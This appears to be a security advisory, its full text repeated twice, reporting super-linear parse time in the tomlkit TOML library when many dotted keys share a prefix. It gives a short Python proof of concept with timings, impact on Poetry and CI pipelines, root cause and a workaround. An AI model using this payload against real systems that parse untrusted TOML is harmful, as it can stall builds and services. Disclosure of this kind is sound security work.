Summary
tomlkit exhibits super-linear time complexity when parsing TOML documents with multiple dotted keys sharing a common prefix. A valid 1.3 KB document causes 8+ seconds of CPU consumption.
Affected version: 0.15.0 (latest)
Reproduction:
import tomlkit
import time
80 dotted keys with shared prefix — valid TOML, only 1,339 bytes
payload = "\n".join([f"a.b.c.key{i} = {i}" for i in range(80)])
start = time.time()
tomlkit.parse(payload)
print(f"Elapsed: {time.time() - start:.2f}s") # ~8 seconds
Expected behavior: Parsing should complete in milliseconds (tomli handles this in 0.3ms).
Actual behavior: Parsing takes 8+ seconds for 80 keys, with super-linear growth:
10 keys → 0.008s
40 keys → 0.64s
80 keys → 8.15s
Growth factor: 8x more input → 1,036x more time (O(n³) or worse).
Comparison with tomli:
import tomli
tomli.loads(payload) # 0.0003 seconds (25,407x faster)
Impact:
Poetry (30M+ monthly downloads) uses tomlkit to parse pyproject.toml
A malicious pyproject.toml in a git repository could DoS CI/CD pipelines
Any application parsing untrusted TOML with tomlkit is vulnerable
Root cause: The internal table merging logic for dotted keys appears to re-traverse the table hierarchy for each new key, causing polynomial time complexity when many keys share a prefix path.
Workaround: Use tomli/tomllib for parsing untrusted TOML input.
CWE: CWE-400 (Uncontrolled Resource Consumption)
Discovered by: Frédéric Bogaerts, University of Coimbra (VAITP Research Project)
Summary
tomlkit exhibits super-linear time complexity when parsing TOML documents with multiple dotted keys sharing a common prefix. A valid 1.3 KB document causes 8+ seconds of CPU consumption.
Affected version: 0.15.0 (latest)
Reproduction:
import tomlkit
import time
80 dotted keys with shared prefix — valid TOML, only 1,339 bytes
payload = "\n".join([f"a.b.c.key{i} = {i}" for i in range(80)])
start = time.time()
tomlkit.parse(payload)
print(f"Elapsed: {time.time() - start:.2f}s") # ~8 seconds
Expected behavior: Parsing should complete in milliseconds (tomli handles this in 0.3ms).
Actual behavior: Parsing takes 8+ seconds for 80 keys, with super-linear growth:
10 keys → 0.008s
40 keys → 0.64s
80 keys → 8.15s
Growth factor: 8x more input → 1,036x more time (O(n³) or worse).
Comparison with tomli:
import tomli
tomli.loads(payload) # 0.0003 seconds (25,407x faster)
Impact:
Poetry (30M+ monthly downloads) uses tomlkit to parse pyproject.toml
A malicious pyproject.toml in a git repository could DoS CI/CD pipelines
Any application parsing untrusted TOML with tomlkit is vulnerable
Root cause: The internal table merging logic for dotted keys appears to re-traverse the table hierarchy for each new key, causing polynomial time complexity when many keys share a prefix path.
Workaround: Use tomli/tomllib for parsing untrusted TOML input.
CWE: CWE-400 (Uncontrolled Resource Consumption)
Discovered by: Frédéric Bogaerts, University of Coimbra (VAITP Research Project)